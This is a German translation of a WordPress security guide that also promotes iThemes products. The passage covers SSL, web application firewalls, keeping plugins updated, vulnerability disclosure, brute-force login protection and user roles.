Nicht alle Webhosts sind gleich und die Auswahl eines Webhosts allein aufgrund des Preises kann Sie aufgrund von WordPress-Sicherheitsproblemen auf lange Sicht viel mehr kosten. Die meisten Shared-Hosting-Umgebungen sind sicher, aber einige trennen Benutzerkonten nicht angemessen.

Ihr Host sollte wachsam sein, die neuesten Sicherheitspatches anzuwenden und andere wichtige Best Practices für die Sicherheit von WordPress in Bezug auf Server- und Dateisicherheit zu befolgen. Ihr Host sollte wachsam sein, die neuesten Sicherheitspatches anzuwenden und andere wichtige Best Practices für die Hosting-Sicherheit in Bezug auf Server- und Dateisicherheit zu befolgen.

Verschlüsseln Sie Ihre WordPress-Site mit SSL

Secure Sockets Layer, auch bekannt als SSL, ist eine Sicherheitstechnologie, die eine Verschlüsselung zwischen einem Client und einem Webserver bereitstellt. Um dies etwas einfacher zu verstehen, ist ein „Client“ ein Webbrowser wie Chrome oder Safari und ein „Webserver“ ist Ihre Website oder Ihr Online-Shop.

Eine einfache Möglichkeit, um festzustellen, ob auf der von Ihnen besuchten Website ein SSL-Zertifikat installiert ist, besteht darin, in der Adressleiste Ihres Browsers nachzusehen, ob die URL mit HTTP oder HTTPS beginnt. Wenn die URL mit einem HTTPS beginnt, surfen Sie sicher auf einer Site, die SSL verwendet.

Warum ist SSL so wichtig?

Nicht im Jahr 2021 ein SSL - Zertifikat aufweist , ist teuer. Wieso den? Wenn SSL auf Ihrer Website nicht aktiviert ist, wird es für potenzielle Kunden schwieriger, Ihre Existenz zu entdecken, und diejenigen, die Ihre Website finden, haben möglicherweise Angst, Ihnen Geld zu geben.

Bei jedem Online-Einkauf findet eine Kommunikation zwischen Ihrem Browser und dem Online-Shop statt. Wenn wir beispielsweise unsere Kreditkartennummer in unseren Browser eingeben, teilt unser Browser die Nummer mit dem Online-Shop. Nachdem der Shop die Zahlung erhalten hat, teilt er Ihrem Browser mit, dass Ihr Kauf erfolgreich war.

Beachten Sie bei den Informationen, die zwischen unserem Browser und dem Server des Geschäfts ausgetauscht werden, die Tatsache, dass die Informationen während des Transports mehrere Stationen machen. SSL bietet eine Verschlüsselung der Kommunikation, um sicherzustellen, dass unsere Kreditkarte nicht gesehen wird, bis sie das endgültige Ziel des Servers des Geschäfts erreicht.

Um besser zu verstehen, wie die Verschlüsselung funktioniert, sollten Sie sich überlegen, wie unsere Einkäufe zugestellt werden. Wenn Sie jemals den Lieferstatus eines Online-Einkaufs verfolgt haben, haben Sie gesehen, dass Ihre Bestellung mehrere Stationen gemacht hat, bevor sie bei Ihnen zu Hause ankommt. Wenn der Verkäufer Ihren Kauf nicht richtig verpackt hat, können die Leute leicht sehen, was Sie gekauft haben.

SSL ist ein entscheidendes Werkzeug, um zu verhindern, dass Bösewichte sensible Informationen wie Passwörter und Kreditkartennummern abfangen, die zwischen Client und Webserver geteilt werden.

Warum ist ein SSL-Zertifikat ein Muss für jede Website?

Die WordPress-Sicherheitsvorteile, die Sie durch ein SSL-Zertifikat auf Ihrer Website gewinnen, reichen aus, um es zu einem Muss für jede Website zu machen. Um jedoch jeden zu ermutigen, seine Website-Besucher zu schützen, haben Webbrowser und Suchmaschinen negative Anreize geschaffen, jeden zur Verwendung von SSL zu ermutigen. In diesem Abschnitt werden wir die kostspieligen Folgen behandeln, wenn Sie SSL auf Ihrer Website nicht aktivieren.

1. Wenn SSL nicht aktiviert ist, wird Ihr SEO-Ranking beeinträchtigt

Suchmaschinenoptimierung oder SEO ist der Prozess der Optimierung Ihrer Website, um durch Suchmaschinen-Ergebnisseiten organisch gefunden zu werden. Der Vorteil von SEO ist, dass es eine hervorragende Möglichkeit für Sie ist, den organischen und unbezahlten Verkehr auf Ihrer Website zu erhöhen. Wenn Sie einen Brotbackkurs verkaufen, möchten Sie, dass Ihre Website auf der ersten Ergebnisseite für jemanden steht, der bei Google sucht, oder Duck Duck Go für einen Brotbackkurs.

Wenn SSL auf Ihrer Website nicht aktiviert ist, werden Sie von Suchmaschinen bestraft und Ihr Ranking herabgestuft. Eine der Metriken, die Google verwendet, um Websites in ihren Suchergebnissen einzustufen, ist die Vertrauenswürdigkeit. Es liegt im besten Interesse von Google, seine Nutzer nicht auf unsichere Websites zu schicken, daher wird Vertrauenswürdigkeit in ihrem Ranking-Algorithmus stark gewichtet. Da SSL so viel Sicherheit bietet, ist es ein wesentlicher Bestandteil der Bewertung der Vertrauenswürdigkeit einer Website durch Google.

2. Browser markieren Nicht-SSL-Sites als nicht sicher

Eine andere Möglichkeit, SSL nicht aktiviert zu haben, kostet Sie, dass der Browser Ihres Besuchers ihn warnt, dass Ihre Site nicht sicher ist. Wie wir bereits erwähnt, nachdem Sie ein SSL - Zertifikat auf Ihrer Webseite installieren, ändert sich die URL Ihrer Website Form http: //yourwebsite.com zu https: // yourwebsite / com. Chrome beispielsweise markiert HTTPS-verschlüsselte Webseiten mit einem verschlossenen Vorhängeschloss als sicher. Alternativ ersetzt Chrome das gesperrte Vorhängeschloss für alle HTTP-nicht verschlüsselten Webseiten durch den Text Not Secure .

Ich werde nicht auf Websites einkaufen, die von meinem Browser als unsicher gekennzeichnet wurden, und ich bin nicht der einzige, der dies nicht tut. Laut einer Studie von GlobalSign meiden 85 % der Online-Käufer ungesicherte Websites. Denken Sie daran, dass es im Jahr 2021 wichtig ist, dass alle Ihre Websites HTTPS verwenden und nicht nur Ihre Anmelde- und Checkout-Seiten. Ein potenzieller Kunde schafft es möglicherweise nicht zu einer sicheren Kasse, wenn die Shop-Seiten von seinem Webbrowser als nicht sicher gekennzeichnet sind.

3. Sie können potenzielle Kunden verlieren

Der Schutz Ihrer Kunden ist der wesentliche Grund, SSL auf Ihrer Website zu aktivieren. Wenn sie bereit sind, Ihnen ihr Geschäft anzuvertrauen, können Sie dieses Vertrauen zumindest belohnen, indem Sie sie mit der Kraft der Verschlüsselung schützen.

Wenn ein Hacker die Kreditkartendaten Ihres Kunden aufgrund der fehlenden Verschlüsselung auf Ihrer Website stehlen kann, verlieren Sie nicht nur sein Vertrauen, sondern Sie verlieren auch alle zukünftigen Geschäfte.

Wie kann ich feststellen, ob auf meiner Website SSL aktiviert ist?

Eine einfache Möglichkeit, um festzustellen, ob auf Ihrer Website ein SSL-Zertifikat installiert ist, besteht darin, in der Adressleiste Ihres Browsers nachzusehen, ob die URL mit HTTP oder HTTPS beginnt. Wenn die URL mit einem HTTPS beginnt, ist Ihre Website mit SSL gesichert.

Sie können auch einen SSL-Checker wie SSL Labs verwenden. Ein SSL-Checker durchsucht Ihre Site nach einem SSL-Zertifikat und informiert Sie, wenn Ihr SSL-Zertifikat abläuft.

Wie kann ich ein SSL-Zertifikat auf meiner WordPress-Website installieren?

Wenn Ihrer WordPress-Website SSL fehlt, sollten Sie zunächst Ihren Hosting-Provider fragen, ob er ein kostenloses SSL-Zertifikat und eine kostenlose Konfiguration bereitstellt. Im Jahr 2021 schließen die meisten Hosting-Unternehmen SSL in ihre Hosting-Pakete ein. Zum Beispiel bietet und verwaltet iThemes Hosting SSL für jede Website.

Wenn Ihr Host Ihnen kein kostenloses SSL-Zertifikat zur Verfügung stellt, machen Sie sich keine Sorgen, es gibt noch viele andere Optionen.

Cloudflare bietet ein kostenloses Shared SSL-Zertifikat für WordPress-Websites. Wenn Sie kein Shared SSL-Zertifikat bevorzugen und mit der Befehlszeile vertraut sind, ist CertBot eine ausgezeichnete Option. Certbot erstellt mit Let's Encrypt nicht nur ein kostenloses SSL-Zertifikat für Sie, sondern verwaltet auch automatisch die Erneuerung des Zertifikats für Sie.

Die Aktivierung von SSL auf Ihrer WordPress-Website ist im Jahr 2021 ein Muss. SSL sichert die Kommunikation zwischen Ihnen und Ihren Kunden, verbessert Ihre SEO und gibt den Besuchern Ihrer Website den Komfort, dass sie beim Surfen auf Ihrer Website sicher sind.

Verwenden Sie eine Webanwendungs-Firewall

Die Verwendung einer Web Application Firewall ist eine großartige Möglichkeit, Ihrer WordPress-Website eine weitere Schutzebene hinzuzufügen.

Was ist eine Webanwendungs-Firewall?

Eine WAF oder Web Application Firewall hilft, Ihre Website zu schützen, indem sie den Internetverkehr überwacht, der auf Ihre Website geleitet wird, bevor er auf Ihre Website gelangt.

Durch das Hinzufügen einer WAF vor WordPress fügen Sie einen Sicherheitskontrollpunkt zwischen dem Internet und Ihrer Website hinzu. Bevor der Verkehr auf Ihre Website zugreifen kann, muss er die WAF passieren.

Wenn die WAF bösartigen Datenverkehr – wie CSRF, XSS, SQL Injections und mehr – erkennt, filtert sie ihn heraus, bevor er Ihre Website erreicht. Darüber hinaus kann eine WAF helfen, einen DDoS-Angriff zu erkennen und eine Geschwindigkeitsbegrenzung zu implementieren, um einen Absturz Ihrer Website zu verhindern.

Die 3 Möglichkeiten zur Implementierung einer WAF

Es gibt 3 verschiedene Möglichkeiten, eine WAF zu implementieren. Werfen wir einen Blick auf die Vor- und Nachteile der einzelnen Typen.

1. Netzwerkbasierte WAF – Eine netzwerkbasierte oder physische WAF ist hardwarebasiert. Der größte Vorteil einer netzwerkbasierten WAF ist die geringe Latenz, die durch die lokale Installation entsteht. Der Nachteil ergibt sich jedoch aus dem Preis für die Lagerung und Wartung der physischen Ausrüstung. Der Preis und die physischen Speicheranforderungen machen dies für die meisten Leute zu einer schlechten Wahl.
2. Hostbasierte WAF – Eine hostbasierte oder lokale WAF wird in WordPress integriert, normalerweise mithilfe eines Plugins. Der Vorteil einer hostbasierten WAF ist, dass sie weniger teuer ist als eine netzwerkbasierte WAF. Der Nachteil einer lokalen WAF sind die Anforderungen Ihrer Serverressourcen. Und da die Traffic-Filterung auf Ihrer Website stattfindet, kann dies zu langsameren Seitenladezeiten für die Besucher Ihrer Website führen.
3. Cloudbasierte WAF – Eine cloudbasierte WAF ist in der Regel die beste Option für die meisten Menschen. Der Vorteil einer Cloud-basierten WAF ist, dass sie erschwinglich ist und Sie sie nicht verwalten müssen. Da der Datenverkehr gefiltert wird, bevor er Ihre Website erreicht, werden Ihre Serverressourcen nicht in Anspruch genommen und Ihre Website nicht verlangsamt. Cloudflare und Sucuri sind beliebte Cloud-basierte Firewall-Anbieter.

Einpacken

In diesem Abschnitt haben wir erfahren, warum die Auswahl des richtigen Hosts so wichtig ist, wie die Kommunikation zwischen unserer Website und ihren Besuchern gesichert wird und wie eine WAF dazu beitragen kann, schädlichen Datenverkehr davon abzuhalten, auf unsere Website zu gelangen.

Im nächsten Abschnitt lernen Sie die Best Practices kennen, um Ihre WordPress-Software sicher zu halten.

Abschnitt 5: WordPress-Softwaresicherheit

Jedes Mal, wenn Sie ein neues Plugin oder Theme installieren, führen Sie einen neuen Code ein, der das Potenzial hat, von Hackern ausgenutzt zu werden. In diesem Abschnitt lernst du die Dos und Don’ts bei der Verwaltung von WordPress, Plugins und Themes.

1. Installieren Sie nur Software von vertrauenswürdigen Quellen

Installieren Sie nur WordPress-Plugins und -Themes aus vertrauenswürdigen Quellen. Sie sollten nur Software installieren, die Sie von WordPress.org, bekannten kommerziellen Repositorys oder direkt von seriösen Entwicklern erhalten. Sie sollten die „nullierte“ Version kommerzieller Plugins vermeiden, da sie bösartigen Code enthalten können. Es spielt keine Rolle, wie Sie Ihre WordPress-Site sperren, wenn Sie derjenige sind, der Malware installiert.

Wenn das WordPress-Plugin oder -Theme nicht auf der Website des Entwicklers vertrieben wird, sollten Sie Ihre Sorgfaltspflicht prüfen, bevor Sie das Plugin herunterladen. Wenden Sie sich an die Entwickler, um zu erfahren, ob sie in irgendeiner Weise mit der Website verbunden sind, die ihr Produkt zu einem kostenlosen oder ermäßigten Preis anbietet.

2. Entfernen Sie nicht verwendete Plugins und Designs

Ungenutzte oder inaktive Plugins und Themes auf Ihrer Website zu haben, ist ein großer WordPress-Sicherheitsfehler. Jeder Code auf Ihrer Website ist ein potenzieller Einstiegspunkt für Hacker.

Es ist gängige Praxis für Entwickler, Code von Drittanbietern – wie JS-Bibliotheken – in ihren Plugins und Designs zu verwenden. Wenn die Bibliotheken nicht ordnungsgemäß gewartet werden, können sie leider Schwachstellen schaffen, die Angreifer nutzen können, um Ihre Website zu hacken.

Hinweis: Verwenden Sie das iThemes Sync Pro Site Audit, um Ihre Webseiten auf Front-End-JavaScript-Bibliotheken mit bekannten Sicherheitslücken zu überprüfen.

Deinstallieren und entfernen Sie alle unnötigen Plugins und Themes auf Ihrer WordPress-Site, um die Anzahl der Zugriffspunkte und des ausführbaren Codes auf Ihrer Website zu begrenzen.

3. Halten Sie Ihre WordPress-Software auf dem neuesten Stand

Die Aktualisierung der Software ist ein wesentlicher Bestandteil jeder WordPress-Sicherheitsstrategie. Updates dienen nicht nur der Fehlerbehebung und neuen Funktionen. Updates können auch kritische Sicherheitspatches enthalten. Ohne diesen Patch machen Sie Ihr Telefon, Ihren Computer, Ihren Server, Ihren Router oder Ihre Website anfällig für Angriffe.

Ein anfälliges Plugin oder Theme zu haben, für das ein Patch verfügbar ist, aber nicht angewendet wird, ist der Hauptschuldige für gehackte WordPress-Websites. Das bedeutet, dass die meisten Sicherheitslücken ausgenutzt werden, NACHDEM ein Patch für die Sicherheitslücke veröffentlicht wurde.

Die häufig gemeldete Equifax-Verletzung hätte verhindert werden können, wenn sie ihre Software aktualisiert hätten. Für den Equifax-Verstoß gab es einfach keine Entschuldigung.

Etwas so Einfaches wie das Aktualisieren Ihrer Software kann Sie schützen. Ignorieren Sie also diese WordPress-Updates nicht – Updates sind eine der grundlegendsten Komponenten der WordPress-Sicherheit und der gesamten Websicherheit.

Patch-Dienstag

Patch Tuesday ist der inoffizielle Begriff, der sich auf die regelmäßigen Fehler- und Sicherheitsfixes bezieht, die Microsoft jeden zweiten Dienstag im Monat veröffentlicht. Es ist fantastisch, dass Microsoft Sicherheitsfixes für einen so zuverlässigen Rhythmus veröffentlicht. Patch Tuesday ist auch der Tag, an dem die Sicherheitslücken, die Microsoft patcht, öffentlich bekannt gegeben werden.

Sehen Sie sich den Abschnitt What to Update & How to Automate your Updates im E-Book The Ultimate Guide to WordPress Security in 2020 an, um zu erfahren, wie Sie Patch Tuesday-Updates automatisch anwenden.

Mittwoch ausnutzen

Am Mittwoch nach dem Patch Tuesday ist es üblich, dass viele Angreifer eine bisher bekannte Schwachstelle auf veralteten und ungepatchten Systemen ausnutzen. Der Mittwoch nach einem Patch Tuesday wurde also inoffiziell als Exploit Wednesday bezeichnet.

Warum greifen Hacker gepatchte Schwachstellen an?

Hacker zielen auf gepatchte Sicherheitslücken ab, weil sie wissen, dass Benutzer nicht aktualisieren (einschließlich Plugins und Designs auf Ihrer Website). Es ist ein Industriestandard, Schwachstellen an dem Tag öffentlich zu machen, an dem sie gepatcht werden. Nachdem eine Schwachstelle öffentlich bekannt wurde, wird die Schwachstelle zu einer „bekannten Schwachstelle“ für veraltete und ungepatchte Versionen der Software. Software mit bekannten Schwachstellen ist ein leichtes Ziel für Hacker.

Hacker mögen einfache Ziele, und Software mit bekannten Schwachstellen zu haben, ist, als würde man einem Hacker Schritt für Schritt Anweisungen geben, um in Ihre WordPress-Website, Ihren Server, Ihren Computer oder jedes andere mit dem Internet verbundene Gerät einzudringen.

Verantwortliche Offenlegung

Sie fragen sich vielleicht, warum eine Schwachstelle offengelegt wird, wenn sie Hackern einen Exploit zum Angriff bietet. Nun, es ist sehr üblich, dass ein Sicherheitsforscher die Schwachstelle findet und dem Softwareentwickler privat meldet.

Bei verantwortungsvoller Offenlegung erfolgt der erste Bericht des Forschers privat an die Entwickler des Unternehmens, dem die Software gehört, jedoch mit der Vereinbarung, dass die vollständigen Details veröffentlicht werden, sobald ein Patch verfügbar ist. Bei erheblichen Sicherheitslücken kann es zu einer leichten Verzögerung bei der Offenlegung der Sicherheitslücke kommen, damit mehr Personen Zeit für das Patchen haben.

Der Sicherheitsforscher kann dem Softwareentwickler eine Frist setzen, um auf den Bericht zu antworten oder einen Patch bereitzustellen. Wird diese Frist nicht eingehalten, kann der Forscher die Schwachstelle öffentlich offenlegen, um Druck auf den Entwickler auszuüben, einen Patch herauszugeben.

Die öffentliche Offenlegung einer Schwachstelle und die scheinbare Einführung eines Zero Day – eine Art von Schwachstelle, die keinen Patch hat und in freier Wildbahn ausgenutzt wird – mag kontraproduktiv erscheinen. Dies ist jedoch der einzige Hebel, mit dem ein Forscher den Entwickler unter Druck setzen kann, die Schwachstelle zu schließen.

Wenn ein Hacker die Schwachstelle entdeckt, könnte er den Exploit stillschweigend nutzen und dem Endbenutzer (das sind Sie) Schaden zufügen, während der Softwareentwickler damit zufrieden ist, die Schwachstelle ungepatcht zu lassen.

Googles Project Zero hat ähnliche Richtlinien, wenn es um die Offenlegung von Sicherheitslücken geht. Sie veröffentlichen die vollständigen Details der Schwachstelle nach 90 Tagen, unabhängig davon, ob die Schwachstelle gepatcht wurde oder nicht.

Aktualisieren lernen: Der harte Weg

Ende 2018 nutzten Hacker aktiv einen Exploit im WP-DSGVO-Compliance-Plugin. Der Exploit ermöglichte es nicht autorisierten Benutzern – Personen, die nicht bei einer Website angemeldet waren – die WP-Benutzerregistrierungseinstellungen zu ändern und die standardmäßige neue Benutzerrolle von einem Abonnenten zu einem Administrator zu ändern. Glücklicherweise handelten die Entwickler des WP-DSGVO-Compliance-Plugins schnell und veröffentlichten am Tag nach der Veröffentlichung einen Patch für die Schwachstelle.

Doch genau wie bei Exploit Wednesday griffen Hacker die Schwachstelle an, obwohl ein Patch veröffentlicht wurde. In den Tagen und Wochen nach der Offenlegung der WP-DSGVO-Compliance-Schwachstelle erhielten wir eine Flut von Berichten, dass WordPress-Websites von Angreifern gehackt wurden, die die Schwachstelle ausnutzten.

Ein anfälliges Plugin oder Theme zu haben, für das ein Patch verfügbar ist, aber nicht angewendet wird, ist der Hauptschuldige für gehackte WordPress-Websites. DAS IST SO FRUSTRIEREND!!!!! Dies bedeutet, dass die meisten WP-Hacks hätten verhindert werden können.

Es ist ärgerlich, an all die Leute zu denken, die viel Geld für die Reinigung ihrer Website ausgegeben haben, an die Einnahmen, die sie verloren haben, während ihre Websites nicht verfügbar waren, und an die zukünftigen Einnahmen, die sie durch den Verlust des Vertrauens ihrer Kunden verloren haben. Es macht es noch ärgerlicher, wenn Sie wissen, dass all diese Qualen mit einem einfachen Update hätten verhindert werden können.

Mit der Versionsverwaltungsfunktion von iThemes Security Pro können Sie Ihre WordPress-Updates anpassen und automatisieren.

4. Verfolgen Sie WordPress-Sicherheitslücken

Wenn Sie Ihre Plugins und Themes auf dem neuesten Stand halten, werden Sie nicht vor jeder WordPress-Sicherheitslücke geschützt. Einige WordPress-Plugins und -Themes wurden von den Entwicklern, die sie erstellt haben, aufgegeben.

Wenn ein aufgegebenes Plugin oder Theme eine Schwachstelle hat, wird es leider nie einen Patch bekommen. Hacker zielen auf Websites ab, die diese jetzt dauerhaft anfälligen Plugins verwenden.

Wenn Sie ein verlassenes Plugin mit einer bekannten Schwachstelle auf Ihrer Website haben, geben Sie Hackern die Blaupausen, die sie benötigen, um Ihre Website zu übernehmen. Aus diesem Grund müssen Sie die neuesten Schwachstellen im Auge behalten.

Es ist schwierig, jede offengelegte WordPress-Sicherheitslücke zu verfolgen und diese Liste mit den Versionen von Plugins und Themes zu vergleichen, die Sie auf Ihrer Website installiert haben. Die Verfolgung von Schwachstellen ist der Unterschied zwischen einer sicheren Website und einer Website, die Hacker leicht ausnutzen können.

Gute Neuigkeiten für dich! Wir verfolgen und teilen jede offengelegte Sicherheitslücke in unseren WordPress Vulnerability Roundups.

5. Scannen Sie Ihre Website auf Schwachstellen

Eine schnellere Möglichkeit besteht darin, Ihre Website vor einfachen Hacker-Exploits zu schützen, indem Sie automatische Scans verwenden, um Ihre Websites auf bekannte Schwachstellen zu überprüfen.

Der iThemes Security Pro Site Scanner ist Ihre Möglichkeit, den Schutz vor Schwachstellen auf all Ihren WordPress-Websites zu automatisieren. Der Site Scanner überprüft Ihre Site auf bekannte Schwachstellen und wendet automatisch einen Patch an, falls einer verfügbar ist.

Die iThemes Security Pro Site prüft auf 3 Arten von Schwachstellen.

1. WordPress-Sicherheitslücken
2. Plugin-Sicherheitslücken
3. Thema Schwachstellen

Die Site-Audit-Funktion von iThemes Sync Pro nutzt die Leistungsfähigkeit von Google Lighthouse, um Ihre Website zu schützen. Das Site Audit überprüft und markiert Seiten, die Front-End-JavaScript-Bibliotheken mit bekannten Sicherheitslücken enthalten.

Es ist gängige Praxis für Entwickler, Code von Drittanbietern – wie JS-Bibliotheken – in ihren Plugins und Designs zu verwenden. Wenn die Bibliotheken nicht ordnungsgemäß gewartet werden, können sie leider Schwachstellen schaffen, die Angreifer nutzen können, um Ihre Website zu hacken. Die Verwendung von Komponenten mit bekannten Sicherheitslücken steht auf der OWASP-Top-10-Liste.

Das Site Audit hat meinen Speck gerettet! Ich habe einen Audit-Zeitplan erstellt, damit Sync Pro wöchentliche automatisierte Audits durchführt und mir die Audit-Berichte per E-Mail zusendet. Ich halte alles auf dem neuesten Stand und war deshalb schockiert, als ich bei einem Audit meiner Website sah, dass ich JavaScript-Bibliotheken mit bekannten Sicherheitslücken verwende.

Der Bericht wies mich auf eine veraltete Version von jQuery im WordPress-Verzeichnis der Website hin, die mit bekannten Schwachstellen übersät ist! Zu meinem Glück habe ich in meinem Sync Pro Site Audit gesehen, dass ich JavaScript-Bibliotheken mit bekannten Sicherheitslücken verwende und das Problem beheben konnte, bevor meine Website gehackt wurde.

Einpacken

Die richtige Verwaltung der Software, die Ihre Website zum Laufen bringt, einschließlich Ihrer WordPress-Plugins, -Themes und des WordPress-Kerns, trägt viel zu Ihrer WordPress-Sicherheitsstrategie bei und schützt Ihre Website vor Online-Angreifern.

Abschnitt 6: Sichern Sie Ihr WordPress-Login

Die WordPress-Anmelde-URL ist für jede WordPress-Site gleich und erfordert keine besonderen Zugriffsberechtigungen. Jeder, der Erfahrung mit WordPress hat, weiß, dass sich die /wp-login.php URL auf der Seite /wp-login.php .

Die Zugänglichkeit der WordPress-Anmeldeseite macht sie zum am stärksten angegriffenen – und potenziell anfälligsten – Teil jeder WordPress-Website. Zum Glück für uns macht es das iThemes Security Pro-Plugin einfach, Ihr WordPress-Login zu sichern.

Werfen wir einen Blick auf die Tools in iThemes Security Pro, mit denen Sie Ihr WordPress-Login sichern und nahezu undurchdringlich machen können!

1. Anmeldeversuche begrenzen

Der erste Schritt zur Sicherung Ihres WordPress-Logins besteht darin, fehlgeschlagene Login-Versuche zu begrenzen. Standardmäßig ist in WordPress nichts eingebaut, um die Anzahl fehlgeschlagener Anmeldeversuche zu begrenzen. Ohne eine Begrenzung der Anzahl fehlgeschlagener Anmeldeversuche, die ein Angreifer machen kann, können sie eine Kombination verschiedener Benutzernamen und Passwörter ausprobieren, bis sie einen funktionierenden finden.

Die lokale Brute-Force-Schutzfunktion von iThemes Security Pro verfolgt ungültige Anmeldeversuche eines Hosts oder einer IP-Adresse und eines Benutzernamens. Sobald eine IP oder ein Benutzername zu viele aufeinanderfolgende ungültige Anmeldeversuche unternommen hat, werden sie gesperrt und können für einen bestimmten Zeitraum keine weiteren Versuche unternehmen.

Um mit der Verwendung der Local Brute Force Protection- Funktion zu beginnen, aktivieren Sie sie auf der Hauptseite der iThemes Security Pro-Einstellungsseite.

Mit den Einstellungen für den lokalen Brute-Force-Schutz können Sie die Schwellenwerte für Sperren festlegen.

• Max. Anmeldeversuche pro Host – Die Anzahl der ungültigen Anmeldeversuche, die eine IP erlaubt, bevor sie gesperrt wird.
• Max. Anmeldeversuche pro Benutzer – Dies ist die Anzahl der ungültigen Anmeldeversuche, die ein Benutzername zulässig ist, bevor er gesperrt wird.
• Minuten zum Erinnern an schlechte Anmeldung – So lange sollte ein ungültiger Anmeldeversuch mit einer IP oder einem Benutzernamen für eine Sperre angerechnet werden.
• „Admin“-Benutzer automatisch sperren – Wenn aktiviert, erhält jeder, der beim Anmelden den Admin-Benutzernamen verwendet, eine automatische Sperre.

Es gibt einige Dinge, die Sie beim Konfigurieren Ihrer Sperreinstellungen beachten sollten. Sie möchten Benutzern ungültige Anmeldeversuche geben, als Sie IPs geben. Nehmen wir an, Ihre Website wird einem Brute-Force-Angriff ausgesetzt und der Angreifer verwendet Ihren Benutzernamen. Das Ziel besteht darin, die IP des Angreifers und nicht Ihren Benutzernamen zu sperren, damit Sie sich weiterhin anmelden und Ihre Arbeit erledigen können, selbst wenn Ihre Website angegriffen wird.

Sie möchten diese Einstellungen auch nicht zu streng machen, indem Sie die Anzahl der ungültigen Anmeldeversuche zu niedrig und die Zeit zum Erinnern an ungültige Versuche zu lange einstellen. Wenn Sie die Anzahl der ungültigen Anmeldeversuche für Hosts/IPs auf 1 senken und die Minuten zum Erinnern an einen fehlerhaften Anmeldeversuch auf einen Monat setzen, erhöhen Sie drastisch die Wahrscheinlichkeit, dass legitime Benutzer versehentlich ausgesperrt werden.

2. Begrenzen Sie externe Authentifizierungsversuche pro Anfrage

Neben der Verwendung eines Anmeldeformulars gibt es andere Möglichkeiten, sich bei WordPress anzumelden. Mit XML-RPC kann ein Angreifer in einer einzigen HTTP-Anfrage Hunderte von Benutzernamen und Kennwortversuchen durchführen. Die Brute-Force-Amplifikationsmethode ermöglicht es Angreifern, Tausende von Benutzernamen- und Passwortversuchen mit XML-RPC in nur wenigen HTTP-Anfragen durchzuführen.

Mit den WordPress Tweaks- Einstellungen von iThemes Security Pro können Sie mehrere Authentifizierungsversuche pro XML-RPC-Anfrage blockieren. Die Begrenzung der Anzahl der Benutzernamen- und Passwortversuche auf einen für jede Anfrage wird einen großen Beitrag zur Sicherung Ihres WordPress-Logins leisten.

3. Netzwerk-Brute-Force-Schutz

Bei der Begrenzung von Anmeldeversuchen dreht sich alles um den lokalen Brute-Force-Schutz. Der lokale Brute-Force-Schutz untersucht nur Versuche, auf Ihre Site zuzugreifen, und sperrt Benutzer gemäß den in Ihren Sicherheitseinstellungen festgelegten Sperrregeln.

Der Netzwerk-Brute-Force- Schutz geht noch einen Schritt weiter. Das Netzwerk ist die iThemes Security Community und umfasst über eine Million Websites. Wenn festgestellt wird, dass eine IP versucht, in Websites in der iThemes Security-Community einzudringen, wird die IP zur Sperrliste von Network Bruce Force hinzugefügt.

Sobald eine IP auf der Netzwerk-Brute-Force-Sperrliste steht, wird die IP auf allen Websites im Netzwerk gesperrt. Wenn also eine IP meine Website angreift und gesperrt wird, wird dies an das iThemes Security Brute Force Network gemeldet. Mein Bericht kann dazu beitragen, dass die IP im gesamten Netzwerk gesperrt wird. Ich finde es toll, dass ich dazu beitragen kann, die WordPress-Anmeldung anderer Leute zu sichern, indem ich einfach den iThemes Security Network Protection aktiviere.

Um mit der Verwendung von Network Force Protection zu beginnen , aktivieren Sie es auf der Hauptseite der Sicherheitseinstellungen.

Geben Sie dann Ihre E-Mail-Adresse ein, wählen Sie aus, ob Sie E-Mail-Updates erhalten möchten oder nicht und klicken Sie dann auf die Schaltfläche Speichern .

4. Beschränken Sie den Gerätezugriff auf das WP-Dashboard

Der letzte Schritt zur Sicherung Ihres WordPress-Logins besteht darin, den Zugriff auf Ihr WordPress-Dashboard auf eine Reihe von Geräten zu beschränken. Die vertrauenswürdige Gerätefunktion von iThemes Security Pro identifiziert die Geräte, die Sie und andere Benutzer verwenden, um sich bei Ihrer WordPress-Site anzumelden . Wenn sich ein Benutzer auf einem unbekannten Gerät angemeldet hat, können Vertrauenswürdige Geräte seine Administratorrechte einschränken. Dies bedeutet, dass ein Hacker in der Lage war, Ihre anderen Anmeldesicherheitsmethoden zu umgehen – nicht sehr wahrscheinlich –, er hätte keine Möglichkeit, böswillige Änderungen an Ihrer Website vorzunehmen.

Um vertrauenswürdige Geräte zu verwenden , aktivieren Sie sie auf der Hauptseite der Sicherheitseinstellungen und klicken Sie dann auf die Schaltfläche Einstellungen konfigurieren .

Entscheiden Sie in den Einstellungen für vertrauenswürdige Geräte, welche Benutzer Sie die Funktion verwenden möchten, und aktivieren Sie dann die Funktionen Funktionen einschränken und Session-Hijacking-Schutz .

Nach dem Aktivieren der neuen Einstellung Vertrauenswürdige Geräte erhalten Benutzer eine Benachrichtigung in der WordPress-Administrationsleiste über ausstehende nicht erkannte Geräte. Wenn Ihr aktuelles Gerät nicht zur Liste der vertrauenswürdigen Geräte hinzugefügt wurde, klicken Sie auf den Link Dieses Gerät bestätigen , um die Autorisierungs-E-Mail zu senden .

Klicken Sie in der E-Mail für die nicht erkannte Anmeldung auf die Schaltfläche Gerät bestätigen , um Ihre aktuellen Geräte zur Liste der vertrauenswürdigen Geräte hinzuzufügen.

Einpacken

Die Zugänglichkeit der WordPress-Anmeldeseite macht sie zum am stärksten angegriffenen – und potenziell anfälligsten – Teil jeder WordPress-Site. Wenn Sie die Schritte in diesem Abschnitt verwenden, wird Ihr WordPress-Login jedoch fast undurchdringlich.

Abschnitt 7: Sichern Sie Ihre WordPress-Benutzer

Wenn wir über Benutzersicherheit sprechen, hören wir oft Fragen wie: Sollte jeder WordPress-Benutzer die gleichen Sicherheitsanforderungen haben und wie viel Sicherheit ist zu viel Sicherheit?

Mach dir keine Sorge. All diese Fragen beantworten wir. Aber lassen Sie uns zunächst über die verschiedenen Arten von WordPress-Benutzern sprechen.

Welche verschiedenen Arten von WordPress-Benutzern gibt es?

Es gibt 5 verschiedene Standard-WordPress-Benutzer.

1. Administrator
2. Editor
3. Autor
4. Mitwirkender
5. Teilnehmer

Jeder Benutzer hat unterschiedliche Fähigkeiten. Die Funktionen bestimmen, was sie tun können, sobald sie auf das Dashboard zugreifen. Lesen Sie mehr über WordPress-Benutzerrollen und -Berechtigungen.

Der potenzielle Schaden verschiedener gehackter WordPress-Benutzer

